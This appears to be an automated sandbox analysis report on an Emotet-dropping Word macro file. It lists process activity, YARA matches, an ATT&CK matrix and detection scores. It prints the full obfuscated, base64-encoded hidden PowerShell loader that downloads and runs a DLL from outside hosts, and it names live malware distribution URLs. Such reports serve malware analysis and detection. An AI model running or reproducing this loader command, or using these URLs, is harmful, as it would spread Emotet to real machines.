kAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAK	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_10010000
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_10011C13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,	7_2_1001106A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_10011874
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_10011C7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,	7_2_10011CB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	7_2_1001190C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_10011980
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,	7_2_10013DAF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	7_2_10014DB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,GetLocaleInfoA,	7_2_10013DE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	7_2_100109FC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	7_2_10009A59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,	7_2_100112C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_10014F07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	7_2_10013F22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	7_2_1000C727
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_10011B52
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,	7_2_1001175D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000E372 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

7_2_1000E372

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: powershell.exe, 00000005.00000002.2093002580.0000000000137000.00000004.00000020.sdmp

Binary or memory string: Sched.exe

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000008.00000002.2096911565.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2096946723.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2098974182.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102146226.0000000000270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106781352.0000000000691000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104372498.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094781101.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097726962.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342697153.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2103138481.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2097776820.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2102968277.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106704317.0000000000670000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2104274004.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101214081.00000000006B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2102416514.0000000000711000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2099046063.0000000000201000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2101161516.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108288197.00000000001C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2108254547.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2342767319.00000000002D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.690000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection111	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting12	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Deobfuscate/Decode Files or Information21	LSASS Memory	File and Directory Discovery3	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel22	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API2	Logon Script (Windows)	Logon Script (Windows)	Scripting12	Security Account Manager	System Information Discovery26	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution3	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Security Software Discovery131	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter111	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Virtualization/Sandbox Evasion2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell4	Rc.common	Rc.common	Masquerading21	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion2	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection111	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Rundll321	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Doc.doc	69%	Virustotal		Browse
Doc.doc	82%	ReversingLabs	Script-Macro.Trojan.Valyria

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll	100%	Joe Sandbox ML
C:\Users\user\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll	90%	ReversingLabs	Win32.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
17.2.rundll32.exe.2d0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
9.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.1f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
13.2.rundll32.exe.1d0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
15.2.rundll32.exe.690000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.6b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.670000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
10.2.rundll32.exe.200000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
16.2.rundll32.exe.1c0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.690000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
12.2.rundll32.exe.710000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.290000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.1a0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

Source	Detection	Scanner	Label	Link
paulscomputing.com	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://goldilockstraining.com/wp-includes/bftt/	15%	Virustotal		Browse
https://goldilockstraining.com/wp-includes/bftt/	100%	Avira URL Cloud	malware
http://biglaughs.org/smallpotatoes/rRwRzc/	17%	Virustotal		Browse
http://biglaughs.org/smallpotatoes/rRwRzc/	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://paulscomputing.com	12%	Virustotal		Browse
http://paulscomputing.com	0%	Avira URL Cloud	safe
http://paulscomputing.com/CraigsMagicSquare/H/	19%	Virustotal		Browse
http://paulscomputing.com/CraigsMagicSquare/H/	100%	Avira URL Cloud	malware
